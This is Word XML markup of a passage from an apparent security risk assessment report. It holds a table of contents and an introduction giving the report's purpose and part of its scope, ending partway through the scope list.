              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A0EADB0" w14:textId="34B88AC9"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4" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811484 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7029E7FD" w14:textId="71C52E16"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5" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation Likelihood Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811485 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12B5D7D0" w14:textId="1051D50E"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6" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Business Impact Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811486 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="652506A0" w14:textId="4800D6D6"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87" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Remediation Difficulty Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811487 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="587C0D94" w14:textId="77415C2F"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88" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ASSESSMENT FINDINGS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811488 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A21BE5C" w14:textId="71615A92"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89" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDIX A - TOOLS USED</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811489 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B908FDC" w14:textId="2CDEBC4E" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc155811490" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDIX B - ENGAGEMENT INFORMATION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811490 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23EBCCDB" w14:textId="07A2E876"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91" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Client Information</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811491 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="281EB09F" w14:textId="5601EB11"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92" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Version Information</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811492 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C6A8D0B" w14:textId="031CD5D9" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc155811493" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Contact Information</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811493 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="309CC610" w14:textId="5EB1AB32" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="9360"/>
            </w:tabs>
            <w:spacing w:before="60" w:after="80" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0967245D" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54EAC160" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_nfb2d0joh7yb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F2414" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc155811451"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.   Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F97D2F4" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26514A3C" w14:textId="08FC17B6" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc155811452"/>
      <w:r>
        <w:t>Purpose</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1949A802" w14:textId="77777777" w:rsidR="00667869" w:rsidRPr="00EA24AF" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The primary objective of this risk assessment is to fortify the existing security infrastructure within the framework of the organization's overarching security program. By conducting a thorough analysis of potential risks and vulnerabilities, this assessment aims to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF13AB" w14:textId="77777777" w:rsidR="00667869" w:rsidRPr="00EA24AF" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FE276F" w14:textId="77777777" w:rsidR="00667869" w:rsidRPr="00EA24AF" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Identify and prioritize potential threats that could compromise the confidentiality, integrity, and availability of critical systems and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E11368D" w14:textId="77777777" w:rsidR="00667869" w:rsidRPr="00EA24AF" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Assess the effectiveness of current security controls and protocols in mitigating identified risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C2138" w14:textId="77777777" w:rsidR="00667869" w:rsidRPr="00EA24AF" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Provide actionable insights and recommendations to enhance the resilience of the organization's security posture against emerging threats and vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17999E5D" w14:textId="43A946C1" w:rsidR="00ED747A" w:rsidRPr="00EA24AF" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA24AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Support informed decision-making processes regarding resource allocation and strategic planning to proactively address security gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5D22F5" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1314A7" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc155811453"/>
      <w:r>
        <w:t>1.2. Scope of this risk assessment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C2A0D" w14:textId="77777777" w:rsidR="00ED747A" w:rsidRDefault="00ED747A" w:rsidP="00ED747A">
      <w:pPr>
        <w:pStyle w:val="BodyTextIndent"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRoman" w:hAnsi="TimesNewRoman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536B8AD1" w14:textId="77777777" w:rsidR="00667869" w:rsidRPr="00667869" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This risk assessment encompasses an in-depth evaluation of various system components, elements, and user interactions within the organization's infrastructure. The scope includes, but is not limited to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB962D1" w14:textId="69EB8E75" w:rsidR="00667869" w:rsidRPr="00667869" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>System Components:</w:t>
      </w:r>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA24AF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6610E588" w14:textId="730D6C8C" w:rsidR="00667869" w:rsidRPr="00667869" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Elements:</w:t>
      </w:r>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Examination of data storage, processing systems, communication channels, and access controls.</w:t>
      </w:r>
      <w:r w:rsidR="00EA24AF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> All of it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31428B0B" w14:textId="3271E69E" w:rsidR="00667869" w:rsidRPr="00667869" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Users:</w:t>
      </w:r>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Assessment of user roles, privileges, and their impact on security.</w:t>
      </w:r>
      <w:r w:rsidR="00EA24AF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> All of them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DCE967" w14:textId="77777777" w:rsidR="00667869" w:rsidRPr="00667869" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Field Site Locations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> If applicable, assessment of remote or field site locations to evaluate their integration with the central system and associated security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F30E67" w14:textId="60F1B549" w:rsidR="00667869" w:rsidRDefault="00667869" w:rsidP="00667869">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667869">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
